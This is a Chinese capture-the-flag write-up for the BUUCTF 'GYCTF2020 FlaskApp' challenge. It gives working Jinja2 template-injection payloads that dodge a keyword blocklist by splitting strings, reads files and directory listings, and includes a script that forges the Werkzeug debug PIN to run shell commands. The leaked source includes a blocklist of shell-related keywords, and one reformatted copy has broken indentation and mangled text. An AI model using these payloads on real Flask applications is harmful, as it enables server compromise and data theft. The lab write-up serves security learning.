BUUCTF-WEB 【GYCTF2020】FlaskApp 1

发表于 更新于 分类于 阅读次数: 评论数:

SSIT题

第一种方式:绕过waf读取保存flag的文件

读取app.py源代码的payload

1
2
3
4
5
{% for c in [].__class__.__base__.__subclasses__() %}
	{% if c.__name__=='catch_warnings' %}
		{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
	{% endif %}
{% endfor %}
1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from flask import Flask,render_template_string from flask import render_template,request,flash,redirect,url_for from flask_wtf import FlaskForm from wtforms import StringField, SubmitField from wtforms.validators import DataRequired from flask_bootstrap import Bootstrap import base64 app = Flask(__name__) app.config['SECRET_KEY'] = 's_e_c_r_e_t_k_e_y' bootstrap = Bootstrap(app) class NameForm(FlaskForm): text = StringField('BASE64加密',validators= [DataRequired()]) submit = SubmitField('提交') class NameForm1(FlaskForm): text = StringField('BASE64解密',validators= [DataRequired()]) submit = SubmitField('提交') def waf(str): black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"] for x in black_list : if x in str.lower() : return 1 @app.route('/hint',methods=['GET']) def hint(): txt = "失败乃成功之母!!" return render_template("hint.html",txt = txt) @app.route('/',methods=['POST','GET']) def encode(): if request.values.get('text') : text = request.values.get("text") text_decode = base64.b64encode(text.encode()) tmp = "结果 :{0}".format(str(text_decode.decode())) res = render_template_string(tmp) flash(tmp) return redirect(url_for('encode')) else : text = "" form = NameForm(text) return render_template("index.html",form = form ,method = "加密" ,img = "flask.png") @app.route('/decode',methods=['POST','GET']) def decode(): if request.values.get('text') : text = request.values.get("text") text_decode = base64.b64decode(text.encode()) tmp = "结果 : {0}".format(text_decode.decode()) if waf(tmp) : flash("no no no !!") return redirect(url_for('decode')) res = render_template_string(tmp) flash( res ) return redirect(url_for('decode')) else : text = "" form = NameForm1(text) return render_template("index.html",form = form, method = "解密" , img = "flask1.png") @app.route('/<name>',methods=['GET']) def not_found(name): return render_template("404.html",name = name) if __name__ == '__main__': app.run(host="0.0.0.0", port=5000, debug=True)

# html 解码
from flask import Flask,render_template_string 
from flask import render_template,request,flash,redirect,url_for 
from flask_wtf import FlaskForm 
from wtforms import StringField, SubmitField 
from wtforms.validators import DataRequired 
from flask_bootstrap 
import Bootstrap 
import base64 
app = Flask(__name__) 
app.config['SECRET_KEY'] = 's_e_c_r_e_t_k_e_y' 
bootstrap = Bootstrap(app) 
class NameForm(FlaskForm):
	text = StringField('BASE64 Æ',validators= [DataRequired()]) 
	submit = SubmitField('Ф') 
class NameForm1(FlaskForm):
	text = StringField('BASE64ãÆ',validators= [DataRequired()]) 
	submit = SubmitField('Ф') 
	def waf(str): 
		black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"] 
		for x in black_list : 
			if x in str.lower() : 
				return 1 
				
   @app.route('/hint',methods=['GET']) 
   	def hint(): 
   		txt = "1%CŸKÍ" 
		return render_template("hint.html",txt = txt) 
		
	@app.route('/',methods=['POST','GET']) 
	def encode(): 
		if request.values.get('text') :
			text = request.values.get("text") 
			text_decode = base64.b64encode(text.encode()) 
			tmp = "Ӝ :{0}".format(str(text_decode.decode())) 
			res = render_template_string(tmp) 
			flash(tmp) 
			return redirect(url_for('encode')) 
        else :
        	text = "" 
        	form = NameForm(text) 
        	return render_template("index.html",form = form ,method = " Æ" ,img = "flask.png") 
	@app.route('/decode',methods=['POST','GET']) 
	def decode(): 
		if request.values.get('text') : 
			text = request.values.get("text") 
			text_decode = base64.b64decode(text.encode()) 
			tmp = "Ӝ  {0}".format(text_decode.decode()) 
            if waf(tmp) : 
            	flash("no no no !!") 
                return redirect(url_for('decode')) 
            res = render_template_string(tmp) 
            flash( res ) 
           	return redirect(url_for('decode')) 
		else : 
			text = "" 
  			form = NameForm1(text) 
			return render_template("index.html",form = form, method = "ãÆ" , img = "flask1.png") 		
            	
	@app.route('/<name>',methods=['GET']) 
	def not_found(name): 
		return render_template("404.html",name = name) 
		
if __name__ == '__main__': 
	app.run(host="0.0.0.0", port=5000, debug=True)

waf 过滤了 ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"] 关键字

查看根目录下所有文件

1
2
3
4
5
{% for c in [].__class__.__base__.__subclasses__() %}
	{% if c.__name__=='catch_warnings' %}
		{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}
	{% endif %}
{% endfor %}
1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

拼接的方式绕过waf

1
2
3
[&#39;bin&#39;, &#39;boot&#39;, &#39;dev&#39;, &#39;etc&#39;, &#39;home&#39;, &#39;lib&#39;, &#39;lib64&#39;, &#39;media&#39;, &#39;mnt&#39;, &#39;opt&#39;, &#39;proc&#39;, &#39;root&#39;, &#39;run&#39;, &#39;sbin&#39;, &#39;srv&#39;, &#39;sys&#39;, &#39;tmp&#39;, &#39;usr&#39;, &#39;var&#39;, &#39;this_is_the_flag.txt&#39;, &#39;.dockerenv&#39;, &#39;app&#39;]
 # html解码
 ['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var', 'this_is_the_flag.txt', '.dockerenv', 'app']

读取this_is_the_flag.txt 文件

1
2
3
4
5
{% for c in [].__class__.__base__.__subclasses__() %}
	{% if c.__name__=='catch_warnings' %}
		{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}
	{% endif %}
{% endfor %}
1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}
第二方式:通过计算PIN码进入shell中执行命令

计算PIN码的6个数据

1、运行app的用户名,/etc/passwd

​ 得到 flaskweb

2、module name 一般固定位flask.app

3、getattr(app, "__name__", app.__class__.__name__)的结果。就是Flask

4、flask库下app.py的绝对路径,不是当前运行的app.py的路径,在debug模式下报错就能直接看见。

/usr/local/lib/python3.7/site-packages/flask/app.py

5、当前网络的mac地址的十进制数。通过文件 /sys/class/net/eth0/address 读取,

02:42:ac:10:ab:40 转成10进制 2485377870656

6、机器的id

对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件,windows的id获取跟linux也不同。对于docker机则读取/proc/self/cgroup,序列号为1那行

1:name=systemd:/docker/8c9b58ed756803d15052dd5f7dc35d106e48f5dbe629ebb1d5494a9f384355af 0::/system.slice/containerd.service

计算PIN的模板

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import hashlib
from itertools import chain
probably_public_bits = [
    '运行app用户名',
    'module name ',
    'Flask',
    'flask库下app.py的绝对路径',
]

private_bits = [
    '当前网络的mac地址的十进制数',
    '机器的id'
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.7/site-packages/flask/app.py',
]

private_bits = [
    '2485377870656',
    '8c9b58ed756803d15052dd5f7dc35d106e48f5dbe629ebb1d5494a9f384355af'
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

得到 243-909-803

在shell 中 执行,就能拿到flag

1
2
3
import os
os.popen("ls -l /").read()
os.popen("cat /this_is_the_flag.txt").read()

image-20210419115801303